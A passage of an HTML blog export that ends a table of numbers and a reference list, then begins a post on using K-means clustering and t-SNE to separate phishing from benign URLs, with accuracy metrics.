padding: 2px 3px; text-align: right; vertical-align: bottom;">6.141237</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.768712}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.768712</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.144812}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.144812</td><td data-sheets-value="{"1":3,"3":1.640483}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.640483</td><td data-sheets-value="{"1":3,"3":0.149433}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.149433</td><td data-sheets-value="{"1":3,"3":0.418004}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.418004</td><td data-sheets-value="{"1":3,"3":0.055891}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.055891</td><td data-sheets-value="{"1":3,"3":0.068169}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.068169</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":12}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">12</td><td data-sheets-value="{"1":3,"3":5.179697}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.179697</td><td data-sheets-value="{"1":3,"3":1.992647}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.992647</td><td data-sheets-value="{"1":3,"3":0.713766}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.713766</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.443053}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.443053</td><td data-sheets-value="{"1":3,"3":0.652553}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.652553</td><td data-sheets-value="{"1":3,"3":0.226234}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.226234</td><td data-sheets-value="{"1":3,"3":0.173608}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.173608</td><td data-sheets-value="{"1":3,"3":0.372956}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.372956</td><td data-sheets-value="{"1":3,"3":0.089291}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.089291</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":13}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">13</td><td data-sheets-value="{"1":3,"3":3.181544}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.181544</td><td data-sheets-value="{"1":3,"3":1.945088}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.945088</td><td data-sheets-value="{"1":3,"3":0.629294}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.629294</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.422005}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.422005</td><td data-sheets-value="{"1":3,"3":1.051774}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.051774</td><td data-sheets-value="{"1":3,"3":2.283579}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">2.283579</td><td data-sheets-value="{"1":3,"3":0.231025}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.231025</td><td data-sheets-value="{"1":3,"3":0.166056}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.166056</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":14}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">14</td><td data-sheets-value="{"1":3,"3":14.11996}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">14.11996</td><td data-sheets-value="{"1":3,"3":2.516235}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">2.516235</td><td data-sheets-value="{"1":3,"3":1.889826}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.889826</td><td data-sheets-value="{"1":3,"3":3.106087}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.106087</td><td data-sheets-value="{"1":3,"3":0.087103}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.087103</td><td data-sheets-value="{"1":3,"3":0.705648}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.705648</td><td data-sheets-value="{"1":3,"3":0.275448}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.275448</td><td data-sheets-value="{"1":3,"3":0.247926}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.247926</td><td data-sheets-value="{"1":3,"3":0.20654}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.20654</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":15}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">15</td><td data-sheets-value="{"1":3,"3":5.828471}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.828471</td><td data-sheets-value="{"1":3,"3":0.885469}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.885469</td><td data-sheets-value="{"1":3,"3":0}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.163353}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.163353</td><td data-sheets-value="{"1":3,"3":0}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.260362}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.260362</td><td data-sheets-value="{"1":3,"3":0.080788}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.080788</td><td data-sheets-value="{"1":3,"3":0.186429}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.186429</td><td data-sheets-value="{"1":3,"3":0.010403}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.010403</td><td data-sheets-value="{"1":3,"3":0.07444}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.07444</td></tr></tbody></table></google-sheets-html-origin></span></div><div><br /></div><div><b>References</b></div><div><b><br /></b></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: x-small;"><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[1] Attention is All They Need: Combatting Social Media Information Operations With Neural Language Models. FireEye, 2019. Available at </span><a href="https://www.fireeye.com/blog/threat-research/2019/11/combatting-social-media-information-operations-neural-language-models.html" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.fireeye.com/blog/threat-research/2019/11/combatting-social-media-information-operations-neural-language-models.html</span></a><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: x-small;"><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[2] Schwartz J. Autonomous Penetration Testing using Reinforcement Learning. University of Queensland, 2018, available at </span><span style="color: #1155cc; font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://arxiv.org/ftp/arxiv/papers/1905/1905.05965.pdf" style="text-decoration-line: none;">https://arxiv.org/ftp/arxiv/papers/1905/1905.05965.pdf</a></span></span></p><span style="font-size: x-small;"><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[3] Mastering the game of Go without human knowledge. DeepMind, 2017. Available at </span><a href="https://www.nature.com/articles/nature24270.epdf" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.nature.com/articles/nature24270.epdf</span></a><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></span></span>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-40458173302552066832020-03-26T15:36:00.000-07:002020-03-27T00:19:20.373-07:00AI and Cybersecurity. Part 4 - Clustering URLs<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipfjE6hJ94JZ2hyphenhyphenh3t8vzc3ugLFRydsnrxOHb3zszy-lnXa557hnxHxmPJVl74OhUyxnNFg8-1PthlUPhLGpG7-u-dekrZXYJGG2mNlRQw90xP-SzukyZFZ0ftvKSjiFXUqfgK0Hf0dkgi/s1600/Clustering_title.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="1015" height="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipfjE6hJ94JZ2hyphenhyphenh3t8vzc3ugLFRydsnrxOHb3zszy-lnXa557hnxHxmPJVl74OhUyxnNFg8-1PthlUPhLGpG7-u-dekrZXYJGG2mNlRQw90xP-SzukyZFZ0ftvKSjiFXUqfgK0Hf0dkgi/s640/Clustering_title.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
In <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-2.html">Part 3</a>, we tried to apply the feature scaling and dimensionality reduction techniques to the dataset with phishing and benign URLs. As a result, we were able to clearly see the distribution of URLs between two classes based on four attributes: registrar, country, lifetime, and protocol.<br />
<br />
But what if we don’t have labels (<i>phishing </i>and <i>benign</i>) for the Internet links in the beginning. Will ML still work to detect phishing attacks? In this case, we may come to unsupervised learning, in particular, clustering. Clustering enables grouping objects of unknown classes according to common features so that we do not need labeled data for a training set.<br />
<a name='more'></a>Here, we're going to use the popular method of clustering called K-means. K-means seeks to minimize the total quadratic deviation of the points of the clusters from the centers of these clusters. There are two clusters in this example.<br />
<div>
<br />
With the t-SNE dimensionality reduction technique for projecting clustered data onto a two-dimensional plane, we obtain the following visualized results (Figure 1).</div>
<div>
<br />
<div style="text-align: center;">
<img src="https://s.dou.ua/storage-files/image3_ZeRji1z.png" /></div>
<br />
<div style="text-align: center;">
<i>Figure 1. </i>Visualization of the URLs in two-dimensional space after clustering with K-means (phishing links - orange dots, benign links - blue dots).</div>
<br />
<br />
<div style="text-align: left;">
The resulting clusters can be compared with the marked data to get an idea of the accuracy of cluster analysis.</div>
<div style="text-align: left;">
<img src="https://s.dou.ua/storage-files/Untitled-4_i6LwSV6.png" /></div>
<div style="text-align: center;">
<i>Figure 2. </i>The training dataset with the labeled data (left) and clustering results K-means (right)</div>
<br />
A more accurate assessment of the clustering efficiency can be obtained using the metrics described in <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-2.html">Part 2</a>: TPR, TNR, FPR, FNR, PPV, NPV, F-measure.<br />
<br />
<ul style="text-align: left;">
<li>TP = 110, TN = 41, FP = 7, FN = 44;</li>
<li>TPR (Recall) = 71%;</li>
<li>TNR = 85%;</li>
<li>FPR = 15%;</li>
<li>FNR = 29%;</li>
<li>PPV (Precision) = 0.94;</li>
<li>NPV = 0.48;</li>
<li>Accuracy = 0.75</li>
<li>F-measure = 0.73.</li>
</ul>
<br />
To improve the accuracy of the method, we can apply feature scaling, which we discussed in <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-3.html">Part 3</a>.<br />
<div style="text-align: center;">
<img src="data:image/png;base64,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